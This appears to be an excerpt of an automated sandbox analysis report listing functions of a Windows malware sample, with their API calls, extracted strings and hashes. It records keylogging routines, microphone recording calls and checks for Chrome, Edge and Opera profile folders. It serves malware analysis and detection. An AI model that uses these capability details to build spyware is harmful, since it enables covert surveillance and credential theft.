                                              • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                              Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                              • UnhookWindowsHookEx.USER32 ref: 0040B102
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                              • String ID: Online Keylogger Stopped
                                              • API String ID: 1623830855-1496645233
                                              • Opcode ID: 539f72ab5f86f5c342155b2b16da774537cba30e5d1a0a8ca2b311f7dcb13205
                                              • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                              • Opcode Fuzzy Hash: 539f72ab5f86f5c342155b2b16da774537cba30e5d1a0a8ca2b311f7dcb13205
                                              • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                              Function 00448C33 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String
                                              • String ID: LCMapStringEx$v%(/
                                              • API String ID: 2568140703-460962935
                                              • Opcode ID: aac5d351483de452061b997450265c1da9567a4c5720285b7a7b965a3286f227
                                              • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                              • Opcode Fuzzy Hash: aac5d351483de452061b997450265c1da9567a4c5720285b7a7b965a3286f227
                                              • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                              Function 004488EB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00447B68,?,00000000,00401D55), ref: 00448956
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DateFormat
                                              • String ID: GetDateFormatEx$v%(/
                                              • API String ID: 2793631785-643211610
                                              • Opcode ID: 0b66ff48f69ef4dc5398cb87b9d9a56043f6319d018847ffafb9003893f5b807
                                              • Instruction ID: f6941c7478d5eab8e57398c9d6433ca31c473008bc8aa5bb9dba32c70cc90d51
                                              • Opcode Fuzzy Hash: 0b66ff48f69ef4dc5398cb87b9d9a56043f6319d018847ffafb9003893f5b807
                                              • Instruction Fuzzy Hash: 7101483254060DFBCF026F90DD02EAE3F62EB18711F404529FE0556162DB3A8932EB99
                                              Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              • waveInPrepareHeader.WINMM(005BF490,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                              • waveInAddBuffer.WINMM(005BF490,00000020,?,00000000,00401A15), ref: 0040185F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$BufferHeaderPrepare
                                              • String ID: XMG
                                              • API String ID: 2315374483-813777761
                                              • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                              • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                              • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                              • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                              Function 004486AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              APIs
                                              • CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004540DC,?,00000000,?,?,0045407B,?,?,?,004540DC), ref: 0044870C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CompareString
                                              • String ID: v%(/${@E
                                              • API String ID: 1825529933-1456095189
                                              • Opcode ID: c59ff1600e81a9d7cc14e49ba47d46eb51e483d76546d1775d30d5012d646167
                                              • Instruction ID: 8e6736c838897f6528360bd958164f8ce9b2e0187cfd10d1682bb83c2631b037
                                              • Opcode Fuzzy Hash: c59ff1600e81a9d7cc14e49ba47d46eb51e483d76546d1775d30d5012d646167
                                              • Instruction Fuzzy Hash: 1F010032500209FBCF02AF90EC01CAE7F66EF48350F018159FE0866220CB36C931EB98
                                              Function 00448A2D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00447B68,?,00000000,00401D55), ref: 00448A86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FormatTime
                                              • String ID: GetTimeFormatEx$v%(/
                                              • API String ID: 3606616251-428954383
                                              • Opcode ID: a25a69d334290a7730d5cedf2ff1b41080d39f4413cc30e31ec7bc367f155a45
                                              • Instruction ID: 5d578e1c3c206df355c43574921470766163c15c74a73bc4749945e38d66d5e1
                                              • Opcode Fuzzy Hash: a25a69d334290a7730d5cedf2ff1b41080d39f4413cc30e31ec7bc367f155a45
                                              • Instruction Fuzzy Hash: CDF0AF3164060CFBDF02AF61DC02EAF7F25EF08701F00456AFC0566262DA768D25ABD9
                                              Function 00448A9D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00451688,?,00000055,00000050), ref: 00448AE7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DefaultUser
                                              • String ID: GetUserDefaultLocaleName$v%(/
                                              • API String ID: 3358694519-3008031579
                                              • Opcode ID: 9ff306badc4e225411c88e932eb7d54158c9f5ea469d8c83c365f0a47e873b96
                                              • Instruction ID: cb50fb5ec78b6d707ffa4f8e888d61193b675851c302ce42c921a9a72cfaf747
                                              • Opcode Fuzzy Hash: 9ff306badc4e225411c88e932eb7d54158c9f5ea469d8c83c365f0a47e873b96
                                              • Instruction Fuzzy Hash: 5CF02431640208FBDB016F65DC02E9EBF61EB04711F00406FFD08AA192EEB98D14968D
                                              Function 0044382C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: `#[
                                              • API String ID: 269201875-4119260463
                                              • Opcode ID: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                              • Instruction ID: 4a6f060c21597e0392f33703011e6e0157da39883ddad7ec559e06d861eb6f1f
                                              • Opcode Fuzzy Hash: 0435164efccf50aa8117c2daa51ec46fe1437c867187ee89b2aa6ea167946eb6
                                              • Instruction Fuzzy Hash: 64E0E532A0152014F6713A3B6D1665B45C68BC1B3AF22423FF425962C2DFAC8946516E
                                              Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                              • API String ID: 1174141254-4188645398
                                              • Opcode ID: 67a37633ad4a3934eb7a9710067efd7b2c9a9b469ed032209e18e61634ff2717
                                              • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                              • Opcode Fuzzy Hash: 67a37633ad4a3934eb7a9710067efd7b2c9a9b469ed032209e18e61634ff2717
                                              • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                              Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                              • API String ID: 1174141254-2800177040
                                              • Opcode ID: 7414731bf553168197ebf71208b97339720711320eac3921dee6b082f9eb1638
                                              • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                              • Opcode Fuzzy Hash: 7414731bf553168197ebf71208b97339720711320eac3921dee6b082f9eb1638
                                              • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                              Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID: AppData$\Opera Software\Opera Stable\
                                              • API String ID: 1174141254-1629609700
                                              • Opcode ID: 8000172e7e681251177a335894fd2e2a37e3823944c94c6a399ddcaad00f7658
                                              • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                              • Opcode Fuzzy Hash: 8000172e7e681251177a335894fd2e2a37e3823944c94c6a399ddcaad00f7658
                                              • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                              Function 00443885 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID: $G
                                              • API String ID: 269201875-4251033865
                                              • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                              • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                              • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                              • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                              Function 00448B04 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountCriticalInitializeSectionSpin
                                              • String ID: InitializeCriticalSectionEx$v%(/
                                              • API String ID: 2593887523-519604286
                                              • Opcode ID: d6f6b47451be03fe87bb48b18d5942180fce92a3d6bf2b1ad52cc6d33cadcdf9
                                              • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                              • Opcode Fuzzy Hash: d6f6b47451be03fe87bb48b18d5942180fce92a3d6bf2b1ad52cc6d33cadcdf9
                                              • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                              Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyState.USER32(00000011), ref: 0040B686
                                                • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                              • String ID: [AltL]$[AltR]
                                              • API String ID: 2738857842-2658077756
                                              • Opcode ID: 0f70a0069a612ae1fb5ede6b6ff70f96726a9fd1eec0d97551c5347f5f324e5e
                                              • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                              • Opcode Fuzzy Hash: 0f70a0069a612ae1fb5ede6b6ff70f96726a9fd1eec0d97551c5347f5f324e5e
                                              • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                              Function 004487E6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Free
                                              • String ID: FlsFree$v%(/
                                              • API String ID: 3978063606-3079978385
                                              • Opcode ID: 171785f1d432a5b0c573e1b080f9ca33f1b139473286017cae901ea3a3a791e5
                                              • Instruction ID: c2240784685aecd6f47a0bca57caed754204828342c7a30858990c1a98a2f1dd
                                              • Opcode Fuzzy Hash: 171785f1d432a5b0c573e1b080f9ca33f1b139473286017cae901ea3a3a791e5
                                              • Instruction Fuzzy Hash: 86E0E531B41618FBD3017F25AC02A6FBB60DB44B12B5001AEFC0597241DE795D14D6DE
                                              Function 00448790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Alloc
                                              • String ID: FlsAlloc$v%(/
                                              • API String ID: 2773662609-593808476
                                              • Opcode ID: 9028625f595808759bb793586bf464a492810f669493d4605a372bfbb870fd40
                                              • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                              • Opcode Fuzzy Hash: 9028625f595808759bb793586bf464a492810f669493d4605a372bfbb870fd40
                                              • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                              Function 004489D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
